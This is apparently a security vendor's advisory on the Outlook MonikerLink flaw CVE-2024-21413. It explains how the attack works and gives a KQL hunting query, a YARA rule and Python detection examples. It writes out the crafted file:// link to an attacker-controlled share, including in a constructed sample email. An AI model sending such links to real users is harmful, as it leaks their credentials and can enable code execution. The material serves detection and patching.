
CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

Discover how CVE-2024-21413 exposes Microsoft Outlook to stealthy remote attacks—learn how it works, how to detect it, and how to stay protected.

Introduction

The disclosure of CVE-2024-21413 in February 2024 raised significant concern within the security community. This critical vulnerability in Microsoft Outlook is a reminder that the mail client itself, not only attachments, is part of the attack surface organizations must defend.

Presenting CVE-2024-21413

CVE-2024-21413, also known as the #MonikerLink bug, is a severe security flaw with a CVSS score of 9.8 (critical). Identified by Check Point Research, it lets an attacker leak the victim's NTLM credentials and potentially achieve remote code execution by abusing the way Outlook handles a specially crafted hyperlink.

Affected Versions

  • Microsoft Office 2016: builds from 16.0.0 up to, but not including, Version 2401 (Build 17231.20236)
  • Microsoft Office LTSC 2021: builds from 16.0.1 up to, but not including, Version 2108 (Build 14332.20637)
  • Microsoft 365 Apps for Enterprise: builds from 16.0.1 up to, but not including, Version 2401 (Build 17231.20236)
  • Microsoft Office 2019: builds from 19.0.0 up to, but not including, Version 2401 (Build 17231.20236)

The build numbers above are the fixed builds for the update channels listed; other channels (Monthly Enterprise, Semi-Annual Enterprise) received the fix in different builds, so check the February 2024 release notes for your channel rather than matching these numbers literally.

How does it work?

Initially, the attacker crafts an email containing a hyperlink of the following form, where $url stands for a UNC path (\\host\share\file.rtf) on a server the attacker controls:

<h1><a href="file:///$url!meeting">Meeting - click here.</a></h1>

When the victim clicks the link, Outlook hands the hyperlink to the Windows COM API MkParseDisplayName(). Outlook normally refuses to follow a file:// hyperlink pointing at a remote share and shows a security warning instead. Appending "!" changes the string into a composite moniker: a FileMoniker for the UNC path followed by an ItemMoniker ("meeting" in the example), and that form slips past the check with no warning. Resolving the FileMoniker makes Windows connect to the attacker's share (SMB, or WebDAV as a fallback) and bind the .rtf file hosted there. Because the file is opened through COM rather than by the user, Word starts as a background COM server and parses the document without showing its normal window and without Protected View.

Two consequences follow. First, the SMB connection itself authenticates with the victim's NTLM credentials, so the attacker's server captures an NTLMv2 hash for relay or offline cracking even if nothing else succeeds. Second, Word parses attacker-supplied RTF outside Protected View, which exposes any Word RTF parsing vulnerability and is the path to arbitrary code execution on the victim's machine. Neither step triggers the warning dialogs a user would normally expect, which is what makes this vector stealthy.


Figure 1: Successful exploitation of CVE-2024-21413 (source)

Detection

Two approaches to detecting exploitation attempts against CVE-2024-21413 are shown below: a KQL hunting query for Microsoft Defender XDR advanced hunting, and a YARA rule that inspects raw email content.

KQL Detection
The query first collects the devices that Defender Vulnerability Management reports as exposed to the CVE, then looks on those devices for successful outbound SMB (TCP 445) connections initiated by Outlook to a public IP address, which is the network footprint of the NTLM-leak step described above:

// Devices that Defender Vulnerability Management reports as exposed to the CVE
let VulnerableEndpoints = DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2024-21413"
| distinct DeviceId;
// Outbound SMB initiated by Outlook itself to an Internet address (the NTLM-leak path)
DeviceNetworkEvents
| where DeviceId in (VulnerableEndpoints)
| where InitiatingProcessFileName =~ "OUTLOOK.EXE"
| where RemotePort == 445
| where RemoteIPType == "Public"
| where ActionType == "ConnectionSuccess"
| project Timestamp, DeviceName, InitiatingProcessAccountUpn, ActionType, RemoteIP, RemoteUrl

Credit: Steven Lim (original query; adapted here to filter DeviceNetworkEvents on the initiating process instead of joining DeviceProcessEvents and DeviceNetworkEvents on DeviceId, which would pair every Outlook process event with every network event on the same device). Note that the "Public" filter will not see a share hosted on an internal host an attacker already controls, and that ConnectionFailed rows on the same predicates are still worth a look, since a blocked egress attempt is evidence that the link was followed.
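The same hunt replayed offline, as an added example that is not part of the original post or of Steven Lim's query: the KQL predicates applied in Python to constructed records shaped like DeviceNetworkEvents rows, so the filter logic can be checked (or run over an exported CSV) without a tenant. VULNERABLE_DEVICES stands in for the DeviceTvmSoftwareVulnerabilities lookup, the public-IP test is a local approximation of Defender's RemoteIPType, and the device IDs and addresses are made up (203.0.113.0/24 is a documentation range used here as an Internet address).

```python
"""Added example, not code from the original post or from Steven Lim's query.

Assumptions: each record carries the DeviceNetworkEvents columns used by the
KQL; VULNERABLE_DEVICES stands in for DeviceTvmSoftwareVulnerabilities; the
public-IP classification approximates Defender's RemoteIPType. All sample
telemetry below is constructed.
"""
import ipaddress

# Address space Defender would not report as RemoteIPType == "Public":
# RFC 1918, loopback, link-local and carrier-grade NAT (approximation).
NON_PUBLIC = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16", "100.64.0.0/10")
]

# Stand-in for: DeviceTvmSoftwareVulnerabilities | where CveId == "CVE-2024-21413"
VULNERABLE_DEVICES = {"dev-a1", "dev-b2"}   # hypothetical DeviceIds


def is_public(ip: str) -> bool:
    """Local approximation of RemoteIPType == 'Public'."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in NON_PUBLIC)


def hunt(events, vulnerable=VULNERABLE_DEVICES):
    """Apply the KQL predicates in the same order and project the same
    columns. Returns the matching rows."""
    hits = []
    for e in events:
        if e["DeviceId"] not in vulnerable:                 # DeviceId in (VulnerableEndpoints)
            continue
        if e["InitiatingProcessFileName"].upper() != "OUTLOOK.EXE":
            continue
        if e["RemotePort"] != 445 or e["ActionType"] != "ConnectionSuccess":
            continue
        if not is_public(e["RemoteIP"]):                    # RemoteIPType == "Public"
            continue
        hits.append({k: e[k] for k in
                     ("Timestamp", "DeviceName", "InitiatingProcessAccountUpn",
                      "ActionType", "RemoteIP")})
    return hits


def _row(device, ip, port=445, action="ConnectionSuccess", proc="OUTLOOK.EXE"):
    """Build one constructed DeviceNetworkEvents-style record."""
    return {"Timestamp": "2024-02-15T09:12:01Z", "DeviceId": device,
            "DeviceName": f"ws-{device}", "InitiatingProcessFileName": proc,
            "InitiatingProcessAccountUpn": "alice@example.com",
            "ActionType": action, "RemoteIP": ip, "RemotePort": port}


# Constructed telemetry; only the first row should fire.
SAMPLE_EVENTS = [
    _row("dev-a1", "203.0.113.10"),                            # Outlook -> Internet SMB: hit
    _row("dev-a1", "10.20.30.40"),                             # internal share: the Public filter misses it
    _row("dev-c3", "203.0.113.10"),                            # not in the vulnerable set (patched host)
    _row("dev-b2", "203.0.113.10", port=443),                  # wrong port
    _row("dev-b2", "203.0.113.10", action="ConnectionFailed"),  # egress blocked: not a success
    _row("dev-b2", "203.0.113.10", proc="explorer.exe"),       # not Outlook
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The second and fifth rows are the ones to think about: an attacker with a foothold on an internal host is invisible to the Public filter, and a ConnectionFailed row means the link was followed but egress was blocked, which is still an exploitation attempt.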

Yara Detection
The rule identifies raw email messages that contain a file:// hyperlink to a UNC path ending in "!", the moniker form used to exploit CVE-2024-21413. It expects message headers to be present ("Subject: " and "Received: "), so run it against .eml/.msg exports or a mail-gateway stream rather than against extracted HTML bodies:

rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {
   meta:
      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
      author = "X__Junior, Florian Roth"
      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
      date = "2024-02-17"
      modified = "2024-02-19"
      score = 75
   strings:
      $a1 = "Subject: "
      $a2 = "Received: "
      $xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
   condition:
      filesize < 1000KB
      and all of ($a*)
      and 1 of ($xr*)
}

Credit: Florian Roth
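To make the link structure from the "How does it work?" section and the YARA pattern above concrete, here is an added example (not code from the original post, from Check Point, or from the YARA rule's authors) that pulls such moniker links out of a raw email and splits each one into the parts an analyst needs for triage: the UNC host the victim's machine would authenticate to, the file type Word would parse, and the ItemMoniker after "!" that defeats Outlook's file:// check. The link shape assumed is file:///\\host\share\file.ext!item; the extension list is a trimmed version of the rule's, and the sample message is constructed.

```python
"""Added example, not code from the original post or from the YARA rule's
authors: extract CVE-2024-21413-style moniker links from a raw e-mail.

Assumed link shape: file:///\\host\share\file.ext!item. The sample message
below is constructed; the extension list is a subset of the YARA rule's.
"""
import email
import re
from dataclasses import dataclass
from email import policy

# Mirrors the YARA $xr1 string: file:///\\ <UNC path> .<ext> !
# Group 1 = UNC path (FileMoniker), group 2 = extension, group 3 = item (ItemMoniker).
MONIKER_RE = re.compile(
    r'file:///(\\\\[^"\'\s<>]{2,600}?\.(rtf|docx?|docm|dotm?|xlsx?|xlsm|pptx?|txt|pdf|hta|lnk))!([^"\'\s<>]*)',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class MonikerLink:
    raw: str        # the matched href text
    unc_path: str   # \\host\share\file.ext, what the FileMoniker resolves
    host: str       # server the victim authenticates to (NTLM leak)
    extension: str  # file type the COM server (Word for .rtf) will parse
    item: str       # the ItemMoniker after '!', the part that bypasses Outlook's check


def _text_bodies(raw_message: str) -> list[str]:
    """Return every text/html and text/plain body in the message, decoded."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    return [
        part.get_content()
        for part in msg.walk()
        if part.get_content_type() in ("text/html", "text/plain")
    ]


def extract_moniker_links(raw_message: str) -> list[MonikerLink]:
    """Find every file:// link carrying an ItemMoniker and decompose it."""
    links = []
    for body in _text_bodies(raw_message):
        for m in MONIKER_RE.finditer(body):
            unc = m.group(1)
            host = unc.lstrip("\\").split("\\", 1)[0]
            links.append(MonikerLink(m.group(0), unc, host, m.group(2).lower(), m.group(3)))
    return links


def is_exploit_attempt(raw_message: str) -> bool:
    """True when at least one file:// link ends in an ItemMoniker ('!')."""
    return bool(extract_moniker_links(raw_message))


# Constructed sample: one moniker link, one ordinary https link and one plain
# file:// link without '!' (which Outlook's own security warning would stop).
SAMPLE_EML = r"""Received: from mail.example.net (constructed sample)
From: sender@example.net
To: victim@example.com
Subject: Meeting
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<h1><a href="file:///\\203.0.113.10\share\meeting.rtf!calendar">Meeting - click here.</a></h1>
<p><a href="https://intranet.example.com/agenda">Agenda</a></p>
<p><a href="file:///\\fileserver.example.com\archive\old.rtf">Archive</a></p>
</body></html>
"""

if __name__ == "__main__":
    for link in extract_moniker_links(SAMPLE_EML):
        print(f"host={link.host} path={link.unc_path} ext={link.extension} item={link.item!r}")
```

The third link in the sample is deliberately a plain file:// UNC link without "!": it is not matched, because without the ItemMoniker Outlook's existing security check still applies. The host field is what to feed into a firewall block or an egress hunt, and it will also tell you whether the share is external or sits inside your own network.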

Remediation

Microsoft fixed CVE-2024-21413 in the February 2024 Patch Tuesday release (13 February 2024). Users and organizations should apply the Office update for their channel without delay; the fix changes how Outlook handles these hyperlinks so the moniker form no longer bypasses the security check. As a compensating control while patching, blocking outbound TCP 445 to the Internet at the perimeter stops the NTLM leak and the file fetch over SMB for this path (it does not cover a share hosted inside the network). Details are in Microsoft's Security Update Guide entry for CVE-2024-21413.

How Senthorus protects its customers

Most cybersecurity experts work in a 9-to-5 environment. The bad news is that threat actors don't. Critical vulnerabilities like CVE-2024-21413 can arise at any time, not only during business hours. This is where Senthorus steps into the breach, providing its customers with cyber defense made in Switzerland through full 24/7 monitoring of their infrastructure. On top of this, Senthorus's registered customers benefit from Incident Response and Digital Forensics services, in direct collaboration with our analysts, available all year round, 24/7/365.

Summary

CVE-2024-21413 highlights the critical importance of maintaining up-to-date systems and the need for vigilant cybersecurity practices. By promptly applying available patches, educating users, and implementing advanced defensive measures, organizations can significantly reduce their exposure to this and similar vulnerabilities. The collective effort of the cybersecurity community in identifying, reporting, and mitigating such threats is crucial in maintaining the integrity and security of digital infrastructures worldwide.
